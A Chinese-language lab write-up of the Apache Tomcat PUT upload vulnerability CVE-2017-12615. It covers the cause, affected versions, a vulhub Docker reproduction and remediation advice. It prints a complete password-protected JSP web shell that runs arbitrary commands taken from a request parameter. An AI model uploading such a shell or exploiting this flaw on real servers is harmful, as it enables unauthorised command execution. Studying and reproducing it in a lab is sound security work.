漏洞简介

2017年9月19日，Apache Tomcat官方确认并修复了两个高危漏洞，漏洞CVE编号：CVE-2017-12615和CVE-2017-12616，其中 远程代码执行漏洞（CVE-2017-12615） 当 Tomcat 运行在 Windows 主机上，且启用了 HTTP PUT 请求方法（例如，将 readonly 初始化参数由默认值设置为 false），攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后，JSP 文件中的代码将能被服务器执行。

漏洞原理

org.apache.jasper.servlet.JspServlet：默认处理jsp，jspx文件请求，不存在PUT上传逻辑，无法处理PUT请求
org.apache.catalina.servlets.DefaultServlet：默认处理静态文件（除jsp，jspx之外的文件），存在PUT上传处理逻辑，可以处理PUT请求。
所以即使可以PUT一个文件到服务器但也无法直接PUT以jsp,jspx结尾文件，因为这些这些后缀的文件都是交由JspServlet处理的，它没法处理PUT请求。
但是当利用Windows特性绕过文件名检测机制时，tomcat并不认为其是jsp文件从而交由DefaultServlet处理，从而成功创建jsp文件

影响版本

Apache Tomcat 7.0.0 - 7.0.79（7.0.81修复不完全）

漏洞复现

环境搭建

cd /vulhub/tomcat/CVE-2017-12615
docker-compose up -d

漏洞验证

原始数据包如下

将GET修改为PUT，并填写内容（这里解析没成功，改成了/1.jsp/）

进入容器，发现上传成功

若从浏览器访问返回Hello，则证明漏洞存在

漏洞利用

将exp写入jsp并上传

<%@ page language="java" contentType="text/html; charset=GBK"pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>一句话木马</title></head><body><%if ("admin".equals(request.getParameter("pwd"))) {java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int len = -1;byte[] bytes = new byte[4092];out.print("<pre>");while ((len = input.read(bytes)) != -1) {out.println(new String(bytes, "GBK"));}out.print("</pre>");}%></body>
</html>

访问即可命令执行

修复建议

升级版本
开启readonly